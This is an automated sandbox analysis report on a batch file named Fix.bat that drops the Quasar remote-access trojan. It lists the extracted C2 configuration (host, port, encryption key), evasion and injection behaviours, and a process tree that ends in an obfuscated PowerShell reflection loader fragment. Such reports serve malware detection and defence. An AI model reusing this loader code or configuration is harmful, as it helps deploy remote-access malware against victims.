Analysis
-
max time kernel
300s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 21:43
Static task
static1
Behavioral task
behavioral1
Sample
Fix.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fix.bat
Resource
win10v2004-20240508-en
General
-
Target
Fix.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1084-78-0x00000000078B0000-0x000000000791C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3612 created 620 3612 powershell.EXE winlogon.exe PID 1300 created 620 1300 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 20 1084 powershell.exe 22 1084 powershell.exe 25 1084 powershell.exe 29 1084 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2412 powershell.exe 3260 powershell.exe 1084 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
install.exeinstall.exepid process 4672 install.exe 1572 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ip-api.com -
Drops file in System32 directory 10 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exepowershell.EXEsvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3612 set thread context of 4284 3612 powershell.EXE dllhost.exe PID 1300 set thread context of 2756 1300 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 21:45:36 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715723136" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Modifies registry class 5 IoCs
Processes:
RuntimeBroker.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 2412 powershell.exe 2412 powershell.exe 3260 powershell.exe 3260 powershell.exe 1084 powershell.exe 1084 powershell.exe 3612 powershell.EXE 3612 powershell.EXE 3612 powershell.EXE 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe Token: 36 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe Token: 36 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1084 powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
Explorer.EXERuntimeBroker.exepid process 3484 Explorer.EXE 4004 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 2416 wrote to memory of 2412 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2412 2416 cmd.exe powershell.exe PID 2416 wrote to memory of 2412 2416 cmd.exe powershell.exe PID 2412 wrote to memory of 3260 2412 powershell.exe powershell.exe PID 2412 wrote to memory of 3260 2412 powershell.exe powershell.exe PID 2412 wrote to memory of 3260 2412 powershell.exe powershell.exe PID 2412 wrote to memory of 4432 2412 powershell.exe WScript.exe PID 2412 wrote to memory of 4432 2412 powershell.exe WScript.exe PID 2412 wrote to memory of 4432 2412 powershell.exe WScript.exe PID 4432 wrote to memory of 3464 4432 WScript.exe cmd.exe PID 4432 wrote to memory of 3464 4432 WScript.exe cmd.exe PID 4432 wrote to memory of 3464 4432 WScript.exe cmd.exe PID 3464 wrote to memory of 1084 3464 cmd.exe powershell.exe PID 3464 wrote to memory of 1084 3464 cmd.exe powershell.exe PID 3464 wrote to memory of 1084 3464 cmd.exe powershell.exe PID 1084 wrote to memory of 4672 1084 powershell.exe install.exe PID 1084 wrote to memory of 4672 1084 powershell.exe install.exe PID 1084 wrote to memory of 4672 1084 powershell.exe install.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 3612 wrote to memory of 4284 3612 powershell.EXE dllhost.exe PID 4284 wrote to memory of 620 4284 dllhost.exe winlogon.exe PID 4284 wrote to memory of 672 4284 dllhost.exe lsass.exe PID 4284 wrote to memory of 944 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 64 4284 dllhost.exe dwm.exe PID 4284 wrote to memory of 508 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1036 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1044 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1060 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1220 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1260 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1268 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1328 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1384 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1412 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1480 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1544 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1556 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1672 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1712 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1756 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1788 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1872 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1960 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1980 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1592 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 1844 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2068 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2148 4284 dllhost.exe spoolsv.exe PID 4284 wrote to memory of 2268 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2300 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2540 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2548 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2660 4284 dllhost.exe sihost.exe PID 4284 wrote to memory of 2672 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2772 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2780 4284 dllhost.exe svchost.exe PID 4284 wrote to memory of 2800 4284 dllhost.exe taskhostw.exe PID 4284 wrote to memory of 2856 4284 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bfdc4a50-2d7f-4cc4-a3e1-3451cad93a5a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0c489a6e-4b9a-4b5d-84e9-cf807edabadd}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BRxQuWYiLWrB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SWfBrdFftBjXnB,[Parameter(Position=1)][Type]$HDxZuSWSNF)$gojqNXesvSC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+',Se'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);